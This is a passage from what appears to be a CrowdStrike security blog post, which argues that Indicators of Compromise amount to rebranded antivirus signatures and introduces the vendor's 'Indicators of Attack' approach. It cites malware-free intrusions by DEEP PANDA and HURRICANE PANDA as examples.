Moving beyond Indicators of Compromise (IOCs)

For the last few years, the security industry has become very enamored

 

with Indicators of Compromise (IOCs) as a way to detect targeted intrusions and adversaries that are flying right past traditional security solutions. There are now numerous vendors who

 

are building

 

products which

 

scan and search for IOCs, enable sharing of IOCs or

 

blocking of IOCs. Old style signature-based solutions (read: AV) are failing to stop advanced attacks, as the argument goes, so you need a new approach of scanning for IOCs instead of relying on file signatures that can't detect the previously unknown malware threats. That sounds great right up until the moment you stop and think for a second about what an Indicator of Compromise actually is - it can be an IP address or domain name/URL, file hash, filename, registry key entry, byte sequence, and so on - you get the point. Now ask yourself what is a signature that an AV-style solution may look for - it will be a file hash, byte sequence, filename, registry key... does that start to look familiar? In fact, IOCs are nothing more than rebranded signatures that still rely on you knowing what a

 

threat is going to look like in order to be able to detect it! If you don't have the precise intelligence on the indicators that an attacker may

 

use against you or if they decide to switch

 

to previously unknown

 

malware, C2 servers and exploits for

 

an attack on your organization, you are fresh out of luck and will never have a chance to detect and stop them. If an adversary engages in a malware-free intrusion, where they've acquired legitimate access into the network with stolen credentials and are roaming around using standard Windows administrative tools such as WMI and 'net use' or use base64-encoded command-lines with Powershell scripts, there are literally almost no IOCs for you to scan for to attempt to identify such intrusions. In fact, this is largely why we are seeing a significant shift towards this very type of modus operandi by Chinese adversaries over the last year - DEEP PANDA and HURRICANE PANDA are two of the China-based adversaries that focus on industrial and intellectual property cyberespionage and who have adopted

 

these tactics in their recent operations. That is why at CrowdStrike we believe that an

 

IOC-based detection approach is a fundamentally flawed solution to the problem of stoping a sophisticated adversary who is going to go through sufficient effort to employ stealthy techniques to fly under the radar of your IOC-based scanner. Three

 

years ago we pioneered a new approach, which we call Indicators of Attack (IOA)